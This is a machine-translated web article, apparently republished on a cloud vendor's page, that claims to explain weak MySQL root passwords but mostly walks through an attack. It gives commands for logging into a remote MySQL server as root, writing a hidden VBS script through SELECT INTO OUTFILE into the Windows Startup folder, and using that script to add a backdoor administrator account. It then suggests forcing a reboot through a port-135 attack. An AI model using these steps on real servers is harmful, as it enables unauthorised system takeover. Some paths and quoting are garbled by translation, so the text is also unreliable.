The method of preventing the MySQL user root password weak password

Source: Internet
Author: User
Keywords Web programming MySQL Tutorial
Tags 192.168.0.1 connect create default directory file installation installed

The article introduces about preventing MySQL user root password weak password attack, we can see their MySQL root is also a security risk.

1, connect to each other MySQL server

Mysql-u root-h 192.168.0.1

Mysql.exe This program is in the bin directory where you have MySQL installed.

2. Let's take a look at some of the databases in the server

Mysql>show databases; MySQL default installation will have MySQL, test these two databases, if you see that there are other databases is user-built database.

3, let us enter the database

Mysql>use test; We will enter the test database.

4. See what data tables we get into the database

Mysql>show tables; By default, no table exists in test.

The following are the key parts

5. Create a new table under test database;

Mysql>create Table A (cmd text); Well, we created a new table named A, which only holds one field in the table, the field name is cmd, and the text.

6, insert content in the table

Mysql>insert into a values ("Set Wshshell=createobject (" "Wscript.Shell") ");

Mysql>insert into a values ("A=wshshell.run (" "cmd.exe/c net User 1 1/add" ", 0)");

Mysql>insert into a values

("B=wshshell.run (" "Cmd.exe/c net localgroup Administrators 1/add" ", 0)");

Note the double quotes and parentheses and the "0" in the back must be entered!  We will use these three commands to create a VBS script! 7, OK, now let's see what's in Table A

Mysql>select * from A; we will see that there are three rows of data in the table, that is, what we just typed, confirm what you typed, and we'll come to the next step.

8, the output table is a VBS script file

Mysql>select * from A to outfile "c:docume~1alluse~1 Start" menu program start A.vbs "; We entered the contents of our table into the Startup group, a script file for VBS! Note the symbol.

9, see this everyone must know, is the use of MySQL output an executable file. Why not bat, because the start of the runtime will have a clear DOS window, and the VBS script can completely hide the window without error prompts! Originally, there should be a sentence after the completion of the script automatically deleted this script, but the Chinese directory is really unable to deal with, only to forget! All right, find a tool to attack 135 and let the server reboot, and in a few minutes you'll be the administrator.

Summary: No matter when you need to pay attention to the security of their own server or not to talk about other applications, this article describes the MySQL root password weak password attack is only a security application of the iceberg one solution.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.